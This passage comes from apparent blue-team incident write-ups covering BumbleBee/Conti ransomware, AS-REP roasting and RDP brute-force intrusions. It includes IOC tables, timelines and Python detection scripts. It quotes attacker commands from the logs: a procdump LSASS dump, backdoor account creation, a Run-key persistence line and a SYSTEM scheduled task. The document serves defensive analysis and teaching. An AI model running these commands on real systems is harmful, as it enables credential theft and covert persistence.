64944D0F73C599C39244B38A8A8BDC79 - masqueraded ApacheBench dropper File BackupUtility.exe MD5: 95BA181C0359495EFFEF4A990365752F - Rubeus File DefragTool.exe MD5: E930B05EFE23891D19BC354A4209BE3E - Mimikatz File SystemDiagnostics.ps1 dropped PowerShell script File C:\\Users\\Default\\AppData\\Local\\Temp\\CrashDump.zip staged share data for exfiltration Registry HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\wyW5PZyF fileless PowerShell persistence - T1547.001 Registry HKCU\\Software\\EdI86bhr value OQqd5sjJ encoded payload storage Registry HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections = 0 RDP enabled on FileServer Account CORPNET\\sanderson initial compromised account Account tcooper AD account cracked via AS-REP Roasting, used for lateral movement Account FileShareService AS-REP Roasted Account Administrator AS-REP Roasted Attack Timeline # %%{init: {'theme': 'base', 
'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef cred fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef lateral fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef exfil fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([CORPNET\\sandersonOffice-PC]):::default --\u003e B[01:05:15 - AdobeUpdater.exe executedmasquerading as Adobe updateractually ApacheBench dropper]:::access B --\u003e C[01:05:17 - C2 connection223.247.47.74:80]:::persist C --\u003e D[01:05:58 - Registry Run keyHKCU\\Run\\wyW5PZyFfileless PowerShell persistence]:::persist D --\u003e E[01:07:09-01:07:19 - Three files droppedBackupUtility.exe + SystemDiagnostics.ps1+ DefragTool.exe into Temp]:::exec subgraph Inject [Injection and Recon] E --\u003e F[01:07:34 - cmd.exe PID 2320 spawnedDLL injection T1055.001GrantedAccess 0x1fffff]:::inject F --\u003e G[01:07:34 - powershell -ep bypassspawned from injected cmd.exe]:::inject G --\u003e H[01:07:52 - DNS query DC01.CORPNET.localresolves to 10.0.0.147LDAP connections to port 389]:::inject end subgraph Cred [Credential Attacks] H --\u003e I[01:10:45 - BackupUtility.exe = Rubeusasreproast /format:hashcat4 accounts roasted - status 0x0]:::cred I --\u003e J[01:14:46 - DefragTool.exe = MimikatzLDAP query to DC01no lsass access]:::cred end subgraph Lateral [Lateral Movement] J --\u003e K[01:17:01 - tcooper Logon Type 3to FileServer from 10.0.0.184]:::lateral K --\u003e L[01:17:14 - fDenyTSConnections = 0RDP enabled on 
FileServer]:::lateral L --\u003e M[01:19:13 - tcooper RDP Logon Type 10from 223.247.47.74 to FileServer]:::lateral end subgraph Collect [Collection] M --\u003e N[01:20:44 - Set-Location C:\\Shares]:::exfil N --\u003e O[01:21:04 - CrashDump.zip createdshares data staged for exfiltration]:::exfil end ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/splunk-shadowroast/","section":"","summary":"A masqueraded AdobeUpdater.exe binary established persistence via a registry Run key, injected into cmd.exe, performed AS-REP Roasting with Rubeus against four AD accounts, laterally moved to FileServer using cracked tcooper credentials, enabled RDP, and staged share data for exfiltration.","title":"Splunk-ShadowRoast","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/sysmon/","section":"Tags","summary":"","title":"Sysmon","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/true-positive/","section":"Tags","summary":"","title":"True Positive","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/upx/","section":"Tags","summary":"","title":"UPX","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/vba/","section":"Tags","summary":"","title":"VBA","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/virustotal/","section":"Tags","summary":"","title":"VirusTotal","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/volatility3/","section":"Tags","summary":"","title":"Volatility3","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/windows/","section":"Tags","summary":"","title":"Windows","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/adfind/","section":"Tags","summary":"","title":"AdFind","type":"tags"},{"content":"","date":"April 13, 
2026","externalUrl":null,"permalink":"/tags/anydesk/","section":"Tags","summary":"","title":"AnyDesk","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/bumblebee/","section":"Tags","summary":"","title":"BumbleBee","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/conti/","section":"Tags","summary":"","title":"Conti","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/elk/","section":"Tags","summary":"","title":"ELK","type":"tags"},{"content":" TL;DR # A phishing email delivered through the anonymous mail relay emkei.cz (114.29.236.247) reached CompliantSecure\u0026rsquo;s mail server MAIL01 at 2024-12-01 20:38:14. Twenty-three minutes later, user Administrator on IT01 downloaded NovaSecure_Audit_Findings.iso via Chrome webmail. After extracting the ISO with 7-Zip, the user executed Compliance_Reports.lnk, which launched BumbleBee loader 23.dll via rundll32.exe, establishing C2 to 3.68.97.124:443. The loader injected into ImagingDevices.exe at 21:09:27 (T1055), which beaconed a second C2 at 18.193.157.255:443. LSASS was dumped via procdump64.exe into C:\\ProgramData\\doc1.dmp. At 22:03, the attacker laterally moved to DC01 via PsExec using cracked markw credentials, dropped 1.7z containing AdFind and AnyDesk, created backdoor account sql_admin, performed network reconnaissance with a bat script, and RDP\u0026rsquo;d to FileServer01 (10.10.11.18). 
The attacker collected and archived share data, moved to Support01 using markw, downloaded Accounts_Updates_1524.csv, and finally executed patch.exe (Conti ransomware) across DC01 and FileServer01, dropping R3ADM3.txt ransom notes across all share directories.\nInitial Access # Phishing Email # To identify the initial access vector I started by examining mail server logs on MAIL01.\nAt 20:38:14, the log recorded Anonymous TLS connection established from emkei.cz[114.29.236.247] - emkei.cz is an anonymous email relay service frequently abused for phishing campaigns. I checked the domain on VirusTotal, where 12 out of 94 vendors flagged it as Malicious/Phishing.\nISO Delivery via Webmail # 23 minutes after the phishing email arrived, I found a Sysmon Event ID 15 (FileCreateStreamHash, logged when a browser writes the Zone.Identifier mark-of-the-web stream to a downloaded file) on host IT01 at 21:02:00.\nUser Administrator downloaded NovaSecure_Audit_Findings.iso (SHA256: F445F806066028D621D8E6A6B949E59342C309DFEB1D517BD847F70069B1B8DD) through chrome.exe from the internal webmail. At 21:02:17, the user extracted the ISO using 7-Zip, which unpacked three files into C:\\Users\\Administrator\\Downloads\\NovaSecure_Audit_Findings: 23.dll, Compliance_Reports.lnk, and Critical_Findings_Summary.pdf.\nExecution # BumbleBee Loader # At 21:02:57 the Administrator double-clicked Compliance_Reports.lnk, which executed:\n1\u0026#34;C:\\Windows\\System32\\rundll32.exe\u0026#34; 23.dll, StartW This is the BumbleBee loader execution pattern - delivering a DLL inside an ISO and triggering it via an LNK file is the signature initial access technique associated with the GOLD CABIN threat group. The StartW export is BumbleBee\u0026rsquo;s standard entry point. 
Immediately at the same timestamp, Sysmon Event ID 3 confirmed rundll32.exe established an outbound TCP connection to 3.68.97.124:443.\nPost-Exploitation Discovery # Starting at 21:10:27, rundll32.exe spawned cmd.exe child processes for host and network enumeration.\nProcess Injection and C2 Persistence # Injection into ImagingDevices.exe # At 21:06:02, rundll32.exe (PID 4764) spawned C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe - a legitimate signed Windows binary selected to blend into normal process activity. At 21:09:27, Sysmon event id 8 (CreateRemoteThread) recorded rundll32.exe (PID 4764) creating a thread inside ImagingDevices.exe - the injection step. The injected process subsequently established a second outbound HTTPS connection, from ImagingDevices.exe on IT01 to 18.193.157.255:443 - a second C2.\nCredential Dumping # At 21:15:03, cmd.exe executed:\n1procdump64.exe -accepteula -ma lsass.exe C:\\ProgramData\\doc1.dmp ProcDump is a legitimate Sysinternals diagnostic utility abused here to create a full memory dump of lsass.exe (-ma writes the complete process memory; -accepteula suppresses the license prompt so it runs unattended). The output file doc1.dmp was named to appear as a generic document. At 21:16:06, ImagingDevices.exe dropped C:\\ProgramData\\7zr.exe to the disk in preparation for compressing and staging the dump for exfiltration.\nLateral Movement # Initial Access to DC01 # With credentials obtained from the LSASS dump, the attacker authenticated to DC01 at 22:03.\nPsExec Deployment # At 22:03:41 on DC01, the file C:\\Windows\\0453497.exe was created, followed immediately at 22:04:02 by registry entries under HKLM\\System\\CurrentControlSet\\Services\\0453497\\ registering it as a Windows service. This matches the PsExec lateral movement pattern, in which the tool copies a service binary to the ADMIN$ share and registers it as a service remotely; the randomly named binary, rather than the stock PSEXESVC.exe, suggests a renamed or reimplemented PsExec. 
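The three records that make up this pattern are individually unremarkable (a file in C:\Windows, a new service key, a SYSTEM process), so the value is in correlating them. The Python below is an added example, not part of the write-up or of any vendor tooling; field names follow Sysmon's event schema, the records are constructed to mirror the DC01 timeline, and the benign svchost.exe row is assumed for contrast.

```python
# Added example (not from the write-up): correlate a Sysmon file create (11), a
# service registry write (13) and a process create (1) into one PsExec-style alert.
import re
from datetime import datetime, timedelta

# \\host\ADMIN$\file.exe as Sysmon renders a parent image launched over the admin share
ADMIN_SHARE = re.compile(r'^\\\\(?P<host>[^\\]+)\\ADMIN\$\\(?P<file>[^\\]+)$', re.IGNORECASE)
SERVICE_KEY = re.compile(r'^HKLM\\System\\CurrentControlSet\\Services\\(?P<svc>[^\\]+)\\',
                         re.IGNORECASE)

# Constructed records mirroring the DC01 timeline in the write-up.
SAMPLE_SYSMON = [
    # Sysmon 11: service binary lands in the root of ADMIN$ (C:\Windows)
    {'EventID': 11, 'UtcTime': '2024-12-01 22:03:41', 'Computer': 'DC01',
     'TargetFilename': 'C:\\Windows\\0453497.exe'},
    # Sysmon 13: the service is registered with that binary as ImagePath
    {'EventID': 13, 'UtcTime': '2024-12-01 22:04:02', 'Computer': 'DC01',
     'TargetObject': 'HKLM\\System\\CurrentControlSet\\Services\\0453497\\ImagePath',
     'Details': 'C:\\Windows\\0453497.exe'},
    # Sysmon 1: SYSTEM child whose parent is the binary as seen through the UNC path
    {'EventID': 1, 'UtcTime': '2024-12-01 22:04:03', 'Computer': 'DC01',
     'Image': 'C:\\Windows\\System32\\rundll32.exe', 'User': 'NT AUTHORITY\\SYSTEM',
     'ParentImage': '\\\\10.10.11.156\\ADMIN$\\0453497.exe'},
    # Benign SYSTEM process for contrast (assumed)
    {'EventID': 1, 'UtcTime': '2024-12-01 22:05:00', 'Computer': 'DC01',
     'Image': 'C:\\Windows\\System32\\svchost.exe', 'User': 'NT AUTHORITY\\SYSTEM',
     'ParentImage': 'C:\\Windows\\System32\\services.exe'},
]


def correlate_psexec(events, window=timedelta(seconds=120)):
    '''Alert when a binary dropped into C:\\Windows, a service key of the same name and
    a child of that binary launched via \\\\host\\ADMIN$ all occur within `window`.'''
    dropped, registered, alerts = {}, {}, []
    for ev in sorted(events, key=lambda e: e['UtcTime']):
        t = datetime.fromisoformat(ev['UtcTime'])
        if ev['EventID'] == 11:
            folder, _, name = ev['TargetFilename'].rpartition('\\')
            if folder.lower() == 'c:\\windows':
                dropped[name.lower()] = t
        elif ev['EventID'] == 13:
            m = SERVICE_KEY.match(ev['TargetObject'])
            if m:
                registered[m.group('svc').lower()] = t
        elif ev['EventID'] == 1:
            m = ADMIN_SHARE.match(ev.get('ParentImage', ''))
            if not m:
                continue
            name = m.group('file').lower()
            svc = name.rsplit('.', 1)[0]
            t_drop, t_reg = dropped.get(name), registered.get(svc)
            if t_drop and t_reg and t - t_drop <= window and t - t_reg <= window:
                alerts.append({'host': ev['Computer'], 'source': m.group('host'),
                               'service': svc, 'child': ev['Image'], 'user': ev['User'],
                               'seconds_from_drop': int((t - t_drop).total_seconds())})
    return alerts


if __name__ == '__main__':
    for a in correlate_psexec(SAMPLE_SYSMON):
        print('PsExec-style service on', a['host'], 'from', a['source'],
              'service', a['service'], 'child', a['child'], 'as', a['user'])
```

The UNC parent path is the strongest single signal: a local process normally has a local parent image, so a parent under \\host\ADMIN$ both confirms remote service execution and names the source host without any network log.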
At 22:04:03, rundll32.exe was launched as NT AUTHORITY\\SYSTEM with parent \\\\10.10.11.156\\ADMIN$\\0453497.exe, confirming PsExec execution originating from host 10.10.11.156.\nPost-Exploitation on DC01 # Tool Staging # At 22:06:58 and 22:07:10, C:\\ProgramData\\1.7z and C:\\ProgramData\\7zr.exe were created. The attacker extracted the archive, producing C:\\ProgramData\\AdFind.exe and C:\\ProgramData\\AnyDesk.exe. AdFind is a command-line Active Directory query tool used for domain reconnaissance. AnyDesk is a legitimate remote access application, deployed here as a backdoor channel that survives independently of the BumbleBee C2 implant.\nBackdoor Account Creation # At 22:07:44 the attacker created a new account and immediately elevated it. Because these commands ran on a domain controller, which has no local SAM user database, net user /add creates a domain account and net localgroup Administrators /ADD places it in the built-in Administrators group of the domain:\n1cmd.exe /C net user sql_admin P@ssw0rd! /add 2cmd.exe /C net localgroup Administrators sql_admin /ADD Network Reconnaissance # At 22:27:01, computers.txt and 1.bat were created on the sql_admin Desktop. At 22:27:11, 1.bat was executed, pinging four domain hosts by name: IT01.ad.compliantsecure.store, DC01.ad.compliantsecure.store, Support01.ad.compliantsecure.store, and FileServer01.ad.compliantsecure.store - confirming all four were reachable for further lateral movement.\nRDP to FileServer01 # At 22:30:17, C:\\Users\\sql_admin\\Documents\\Default.rdp was created, signaling RDP session preparation. At 22:30:26 - 22:31:32, Sysmon Event ID 3 confirmed mstsc.exe connecting from 10.10.11.156 to 10.10.11.18 on port 3389 under sql_admin.\nCollection and Exfiltration # At 22:36 and 22:51 on the file server, PowerShell accessed files across C:\\Users\\sql_admin\\Desktop\\Shares\\ and its subdirectories Documents, Finance, Taxes, and HR. The presence of R3ADM3.txt in every directory indicated ransomware note deployment had already begun during collection. The attacker archived the collected share data into Shares.7z and exfiltrated it.\nRansomware Deployment # At 22:41:21, patch.exe was created in C:\\Shares\\ on FileServer01. 
At 22:50:02, patch.exe was executed locally. And at 22:50:55, it was launched on DC01 via the network share path \\\\10.10.11.18\\Shares\\patch.exe.\nAt 22:50:57, mass creation of R3ADM3.txt across C:\\Users\\Public\\, C:\\Users\\Default\\AppData\\, and other directories confirmed patch.exe as Conti ransomware - the ransom note naming convention R3ADM3.txt is a known Conti indicator.\nIOCs # Type Value Description IP 114.29.236.247 phishing email source, emkei.cz relay IP 3.68.97.124 BumbleBee C2 server, port 443 IP 18.193.157.255 secondary C2 via injected ImagingDevices.exe, port 443 IP 10.10.11.110 IT01 - initial compromised host IP 10.10.11.156 PsExec lateral movement source IP 10.10.11.18 FileServer01 - ransomware deployment target Domain emkei.cz anonymous phishing mail relay, 12/94 VT Host IT01 initial compromise, Administrator and markw Host DC01 lateral movement target via PsExec Host FileServer01 ransomware deployment and data exfiltration Host Support01 lateral movement target via markw File C:\\Users\\Administrator\\Downloads\\NovaSecure_Audit_Findings.iso SHA256: F445F806066028D621D8E6A6B949E59342C309DFEB1D517BD847F70069B1B8DD - BumbleBee delivery ISO File 23.dll BumbleBee loader, executed via rundll32 StartW export File Compliance_Reports.lnk LNK trigger for BumbleBee execution File C:\\ProgramData\\doc1.dmp LSASS memory dump File C:\\ProgramData\\7zr.exe 7-Zip console archiver, dropped by ImagingDevices.exe File C:\\Windows\\0453497.exe PsExec service binary on DC01 File C:\\ProgramData\\AdFind.exe AD reconnaissance tool File C:\\ProgramData\\AnyDesk.exe persistent remote access backdoor File C:\\Shares\\patch.exe Conti ransomware payload File R3ADM3.txt Conti ransom note, dropped across all share directories Registry HKLM\\System\\CurrentControlSet\\Services\\0453497\\ PsExec service registration on DC01 Account Administrator initial compromised account on IT01 Account markw AD account used for DC01 and Support01 lateral movement Account sql_admin 
backdoor account created by attacker, password P@ssw0rd! Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef cred fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef lateral fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef ransom fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([emkei.cz - 114.29.236.247]):::default --\u003e B[20:38:14 - Phishing emaildelivered to MAIL01]:::access B --\u003e C[21:02:00 - Administrator downloadsNovaSecure_Audit_Findings.iso via ChromeIT01 - 10.10.11.110]:::access C --\u003e D[21:02:17 - 7-Zip extracts ISO23.dll + Compliance_Reports.lnk + PDF]:::exec D --\u003e E[21:02:57 - LNK executesrundll32.exe 23.dll StartWC2 to 3.68.97.124:443]:::exec subgraph Inject [Injection and Credential Dumping - IT01] E --\u003e F[21:06:02 - rundll32 spawnsImagingDevices.exe]:::inject F --\u003e G[21:09:27 - CreateRemoteThreadT1055 injection into ImagingDevices.exe]:::inject G --\u003e H[21:10:27 - Discoveryipconfig arp nbtstat]:::exec H --\u003e I[21:15:03 - procdump64 dumpslsass.exe to doc1.dmp]:::cred I --\u003e J[22:29:04 - ImagingDevices.exeC2 to 18.193.157.255:443]:::inject end subgraph DC [Lateral Movement to DC01] J --\u003e K[22:03 - markw elevated logonDC01 via NTLM v2 from IT01]:::lateral K --\u003e L[22:04 - PsExec from 10.10.11.1560453497.exe service - SYSTEM rundll32]:::lateral L --\u003e M[22:07 - AdFind + AnyDesk stagedsql_admin backdoor account 
created]:::lateral M --\u003e N[22:27 - 1.bat network reconpings IT01 DC01 Support01 FileServer01]:::exec end subgraph FS [Lateral Movement to FileServer01 and Support01] N --\u003e O[22:30 - RDP sql_admin10.10.11.156 to 10.10.11.18]:::lateral O --\u003e P[22:39:24 - markw logon to Support01Accounts_Updates_1524.csv collected]:::lateral P --\u003e Q[22:41 - patch.exe dropped to Sharestimestomped - FileServer01]:::exfil Q --\u003e R[22:36-22:51 - share files collectedShares.7z exfiltrated to attacker]:::exfil end subgraph Ransom [Ransomware Deployment] R --\u003e S[22:50:02 - patch.exe executedFileServer01 locally]:::ransom S --\u003e T[22:50:55 - patch.exe via UNC path\\\\10.10.11.18\\Shares\\patch.exe]:::ransom T --\u003e U[22:50:57 - R3ADM3.txt droppedConti ransomware across all directories]:::ransom end ","date":"April 13, 2026","externalUrl":null,"permalink":"/blue_team/elk-bumblebee---gold-cabin/","section":"","summary":"An employee at CompliantSecure received a phishing email from emkei.cz, downloaded a malicious ISO containing BumbleBee loader 23.dll, which established C2 to 3.68.97.124 and injected into ImagingDevices.exe, dumped LSASS credentials, laterally moved to DC01 via PsExec using markw credentials, staged AdFind and AnyDesk, created sql_admin backdoor account, moved to FileServer01 and Support01, exfiltrated archived share data, and deployed Conti ransomware dropping R3ADM3.txt ransom notes.","title":"ELK-BumbleBee - GOLD CABIN","type":"blue_team"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/gold-cabin/","section":"Tags","summary":"","title":"GOLD CABIN","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/iso/","section":"Tags","summary":"","title":"ISO","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/lnk/","section":"Tags","summary":"","title":"LNK","type":"tags"},{"content":"","date":"April 13, 
2026","externalUrl":null,"permalink":"/tags/lsass/","section":"Tags","summary":"","title":"Lsass","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/procdump/","section":"Tags","summary":"","title":"ProcDump","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/psexec/","section":"Tags","summary":"","title":"PsExec","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/ransomware/","section":"Tags","summary":"","title":"Ransomware","type":"tags"},{"content":" TL;DR # An attacker from 77.91.78.115 conducted a brute-force campaign against SecureTech Industries starting at 2024-09-09 16:29:05. Local account michaelwilliams on ST-WIN02 was compromised, followed four minutes later by domain account SECURETECH\\mwilliams with an elevated token. RDP access was established at 17:00:22. The attacker dropped OfficeUpdater.exe via PowerShell, created a registry Run key for persistence, then staged a toolkit archive containing mimikatz.exe, PsExec.exe, and PowerView.ps1. Mimikatz accessed lsass.exe memory and extracted credentials for jsmith. Using jsmith, the attacker moved laterally to domain controller ST-DC01 at 17:34 and file server ST-FS01 at 17:50. On the DC, FileCleaner.exe was dropped and a scheduled task FilesCheck was created for hourly SYSTEM execution. BackupRunner.exe was also deployed and executed. On ST-FS01, Archive_8673812.zip was created for data exfiltration.\nInitial Access # Brute-Force Identification # Knowing a brute-force attack had occurred, I started by filtering logs for Event ID 4625 (An account failed to log on) and aggregating by source address to identify the attack source. 77.91.78.115 was responsible for 16 events - 72.7% of all failed logon activity. Sixteen failures in a short window is a low count for a brute-force campaign; what makes the source significant is the success that follows. I submitted this IP to AbuseIPDB. The lookup confirmed the IP had accumulated 25,047 abuse reports, belonging to provider nuxtcloud geolocated to Helsinki, Finland - a hosting provider frequently used for malicious infrastructure.
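The brute-force triage above reduces to two questions a detection rule can answer from the Security log alone: which source produced the failures, and whether that same source later logged on successfully, and with what kind of session. The script below is an added example written for this page, not code from the original post or from Splunk. It runs over a constructed set of 4625/4624 events shaped like the ones described here (a burst of 16 failures from 77.91.78.115, then successes for michaelwilliams and mwilliams, the last an RDP logon with an elevated token); the benign noise rows and the thresholds are assumptions.

```python
"""Brute-force-then-success detection over Windows Security logon events.

Added example for this writeup; not code from the original post. The events
are constructed to mirror the pattern described (a 4625 burst from
77.91.78.115, then 4624 successes for michaelwilliams and mwilliams, the last
one an RDP logon with an elevated token). Field names follow the Security log;
the thresholds and the benign noise rows are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (UtcTime, EventID, TargetUserName, IpAddress, LogonType, ElevatedToken)
SAMPLE_EVENTS = [
    ("2024-09-09T16:29:%02d" % (5 + i), 4625, "michaelwilliams", "77.91.78.115", 3, None)
    for i in range(16)
] + [
    ("2024-09-09T16:31:10", 4625, "svc_backup", "10.10.5.23", 3, None),   # constructed noise
    ("2024-09-09T16:33:41", 4625, "jdoe", "10.10.5.41", 2, None),
    ("2024-09-09T16:40:02", 4625, "jdoe", "10.10.5.41", 2, None),
    ("2024-09-09T16:44:19", 4625, "svc_backup", "10.10.5.23", 3, None),
    ("2024-09-09T16:45:00", 4625, "printsvc", "10.10.5.88", 3, None),
    ("2024-09-09T16:47:33", 4625, "jdoe", "10.10.5.41", 2, None),
    ("2024-09-09T16:56:05", 4624, "michaelwilliams", "77.91.78.115", 3, "No"),
    ("2024-09-09T17:00:02", 4624, "mwilliams", "77.91.78.115", 3, "Yes"),
    ("2024-09-09T17:00:22", 4624, "mwilliams", "77.91.78.115", 10, "Yes"),
    ("2024-09-09T17:05:00", 4624, "jdoe", "10.10.5.41", 2, "No"),         # success without a burst
]

def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")

def failed_logon_share(events):
    """Failed logons (4625) per source IP as (count, percent of all failures):
    the first pivot in the post. Returns a dict keyed by IpAddress."""
    counts = defaultdict(int)
    for _ts, eid, _user, ip, _lt, _elev in events:
        if eid == 4625:
            counts[ip] += 1
    total = sum(counts.values())
    return {ip: (n, round(100.0 * n / total, 1)) for ip, n in counts.items()}

def detect_bruteforce_success(events, min_failures=10, window=timedelta(hours=1)):
    """Alert on every 4624 whose source IP produced at least min_failures 4625
    events inside `window` before it. Severity is raised when the session got an
    elevated token or is an interactive RDP logon (LogonType 10): either means
    the attacker landed with admin rights or a desktop, not just a password.
    Returns alerts in time order."""
    failures = defaultdict(list)
    alerts = []
    for ts, eid, user, ip, logon_type, elevated in sorted(events, key=lambda e: e[0]):
        t = _parse(ts)
        if eid == 4625:
            failures[ip].append(t)
            continue
        if eid != 4624:
            continue
        recent = [f for f in failures[ip] if timedelta(0) <= t - f <= window]
        if len(recent) < min_failures:
            continue
        severity = "high" if (elevated == "Yes" or logon_type == 10) else "medium"
        alerts.append({"time": ts, "ip": ip, "user": user, "logon_type": logon_type,
                       "elevated": elevated == "Yes", "prior_failures": len(recent),
                       "severity": severity})
    return alerts

if __name__ == "__main__":
    for ip, (n, pct) in sorted(failed_logon_share(SAMPLE_EVENTS).items(), key=lambda kv: -kv[1][0]):
        print("%-15s %3d failures %5.1f%%" % (ip, n, pct))
    for a in detect_bruteforce_success(SAMPLE_EVENTS):
        print("%s %s %s logon_type=%s elevated=%s after %d failures -> %s"
              % (a["time"], a["ip"], a["user"], a["logon_type"], a["elevated"],
                 a["prior_failures"], a["severity"]))
```

The share calculation reproduces the 72.7% figure on the constructed data, and the second function is the rule worth deploying: a success after a burst, scored by what the resulting session can do.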
The attack campaign began at 2024-09-09 16:29:05.\nSuccessful Authentication # At 16:56:05 the attacker successfully authenticated as local user michaelwilliams on machine ST-WIN02 from 77.91.78.115. No activity followed under this account.\nFour minutes later the attacker authenticated as domain account SECURETECH\\mwilliams over NTLMv2 - this time with Elevated Token: Yes, meaning the logon session received a full administrator token rather than a UAC-filtered one, so the account is an administrator on ST-WIN02. The Workstation Name field was recorded as kali, the default hostname of Kali Linux, identifying an attacker-controlled Linux machine rather than a domain workstation.\nAt 17:00:22 Event ID 1149 (TerminalServices-RemoteConnectionManager, user authentication succeeded) recorded a Remote Desktop connection to ST-WIN02 by SECURETECH\\mwilliams from 77.91.78.115 - an interactive session, unlike the network logons seen so far.\nExecution and Persistence # Dropper Deployment # With an interactive RDP session active, the attacker executed PowerShell and at 17:12:14 created C:\\Windows\\Temp\\OfficeUpdater.exe. The filename mimics a legitimate Microsoft Office update component to blend into the environment.\nRegistry Persistence # The attacker immediately established persistence by executing reg.exe with High integrity level to write a Run key:\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeUpdater /t REG_SZ /d \u0026#34;C:\\Windows\\Temp\\OfficeUpdater.exe\u0026#34; /f\nWriting to HKLM\\...\\Run makes the payload launch at every interactive logon of any user on the host (Run keys fire at logon, not at boot), and writing there requires administrative privileges - consistent with the elevated token observed at logon. The corresponding Sysmon Event ID 13 (registry value set) on this key is the artifact to alert on.\nToolkit Staging # At 17:22:57 - 17:23:07 PowerShell created C:\\Users\\Public\\Backup_Tools.zip and Explorer extracted it into C:\\Users\\Public\\Backup_Tools\\, staging three tools.\nmimikatz.exe is an open-source credential extraction tool capable of dumping plaintext passwords and NTLM hashes from LSASS memory. PsExec.exe is a Sysinternals remote execution utility used for lateral movement. PowerView.ps1 is a PowerShell reconnaissance framework for Active Directory enumeration.
Placing these in C:\\Users\\Public\\ - a directory every local account can read and write - keeps them reachable from any user session. Credential Dumping # Mimikatz Execution # At 17:27:34 and again at 17:39:11, mimikatz.exe was launched from C:\\Users\\Public\\Backup_Tools\\ via powershell.exe on ST-WIN02.\nLSASS Memory Access # Sysmon Event ID 10 (ProcessAccess) at 17:27 shows mimikatz.exe opening lsass.exe with GrantedAccess 0x1010 - PROCESS_VM_READ (0x0010) combined with PROCESS_QUERY_LIMITED_INFORMATION (0x1000), the minimal mask needed to read LSASS memory and the one Mimikatz requests for sekurlsa. This access is what yielded the credentials for jsmith. Lateral Movement # Domain Controller and File Server Access # At 17:34:15 - 17:34:17 Event ID 4624 network (Logon Type 3) logons appeared on domain controller ST-DC01 as jsmith from 77.91.78.115. At 17:50:13 - 17:50:15 the same pattern repeated on file server ST-FS01. Note that the source address on both hosts is the external IP, not ST-WIN02: the domain controller and the file server accepted network logons directly from the internet, which is an exposure finding in its own right.\nPersistence on Domain Controller # Between 17:36:36 and 17:42:27 on ST-DC01, the attacker dropped C:\\Windows\\Temp\\FileCleaner.exe (Event ID 11) and created a scheduled task for persistent SYSTEM-level execution:\nschtasks /create /tn \u0026#34;FilesCheck\u0026#34; /tr \u0026#34;powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\FileCleaner.exe\u0026#34; /sc hourly /ru SYSTEM\nThe task name FilesCheck blends with legitimate maintenance tasks. One caveat when assessing it: powershell.exe -File accepts only .ps1 scripts and rejects any other extension, so the action as recorded would fail every hour; check the Task Scheduler operational log (Event ID 200 action started, 201 action completed) before crediting this task as working persistence.
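The Sysmon Event ID 10 access above is the single highest-value record in this chain, and the GrantedAccess mask is what separates it from the dozens of benign LSASS handles a host opens every minute. The script below is an added example for this page, not code from the original post or from Sysmon: it decodes the mask into PROCESS_* rights, flags any lsass.exe access that includes PROCESS_VM_READ from a source image outside an allowlist, and uses an unbacked (UNKNOWN) frame in the CallTrace as a second indicator. The events are constructed to resemble the 17:27 access; the allowlist, the call traces and the EDR vendor path are assumptions.

```python
"""Sysmon Event ID 10 (ProcessAccess) triage for LSASS memory reads.

Added example, not code from the original post or from Sysmon. It decodes the
GrantedAccess mask into PROCESS_* rights, flags any access to lsass.exe that
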